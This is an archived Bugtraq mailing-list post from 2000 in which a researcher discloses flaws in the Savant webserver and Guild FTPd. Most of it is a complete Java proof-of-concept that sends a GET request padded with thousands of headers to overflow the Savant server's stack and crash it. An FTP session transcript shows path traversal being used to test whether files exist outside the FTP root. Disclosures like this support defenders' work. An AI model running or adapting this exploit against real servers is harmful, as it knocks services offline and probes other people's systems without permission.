5263750 2000-07-10 10:58 /110 rader/ Postmaster Mottagare: Bugtraq (import) <11666> Ärende: gnu-pop3d (FTGate problem), Savant Webserver, Guild FTPd ------------------------------------------------------------ Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: <Pine.BSF.4.10.10007081536560.12309-100000@unix.za.net> Date: Sat, 8 Jul 2000 15:41:29 +0200 Reply-To: Andrew Lewis <wizdumb@UNIX.ZA.NET> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: Andrew Lewis <wizdumb@UNIX.ZA.NET> To: BUGTRAQ@SECURITYFOCUS.COM Yo, Errr... Sorry about saying gnu-pop3d had the same problem as FTGate - don't know how that got in my list - I assume from posting after a rather hectic party and before that vital cup of coffee the next day. :) Apologies, all. Anyway, I found a stack overflow in the Savant webserver the other day - lemmee just paste the code I wrote here... /* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant * Written by Wizdumb <wizdumb@leet.org || www.mdma.za.net/fk> * * The overflow occurs when the server recieves too many headers in the GET * request. The results of the attack look something like... * * SAVANT caused an invalid page fault * in module KERNEL32.DLL at 015f:bff87eb5. * * Registers: * * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212 * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030 * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7 * EDX=bff76859 ES=0167 EDI=010a020c GS=0000 * * Bytes at CS:EIP: * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75 * * Stack dump: * * Enjoy! * Andrew Lewis aka. Wizdumb [03/07/2000] */ import java.io.*; import java.net.*; class savantstack { public static void main(String[] args) throws IOException { if (args.length != 1) { System.out.println("Syntax: java savantstack [hostname/ip]"); System.exit(1); } Socket soq = null; PrintWriter white = null; int i = 5000; // This should do fine :-) soq = new Socket(args[0], 80); white = new PrintWriter(soq.getOutputStream(), true); System.out.print("Showing " + args[0] + " the phj33r :P ..."); white.print("GET /index.html HTTP/1.0"); for (int x = 0; x < i; x++) white.println("A:A"); white.println("\n"); System.out.println("Done!"); white.close(); soq.close(); } } That's it. I also found a more minor vulnerability in Guild FTPd - although directory transversal with GET can't be used to d/l files outside of the FTP root directory, it can be used to see if files exist. An example follows... C:\wizdumb>ftp localhost Connected to kung-phusion. 220-GuildFTPD FTP Server (c) 1999 220-Version 0.93i 220 Please enter your name: User (kung-phusion:(none)): test 331 User name okay, Need password. Password: 230 User logged in. ftp> cd .. 550 Access denied. ftp> get ../nonexistant.txt 200 PORT command successful. 550 Access denied. ftp> get ../autoexec.bat 200 PORT command successful. 150 Opening ascii mode data connection for \../autoexec.bat (1143 bytes). 425 Download failed. ftp> quit 221 Goodbye. Control connection closed. The SIZE command can also be used in a similar manner. Anyway, I'm outta here again... Cheers, Andrew Lewis aka. Wizdumb [MDMA] wizdumb@leet.org www.mdma.za.net/fk (5263750) ------------------------------------------(Ombruten)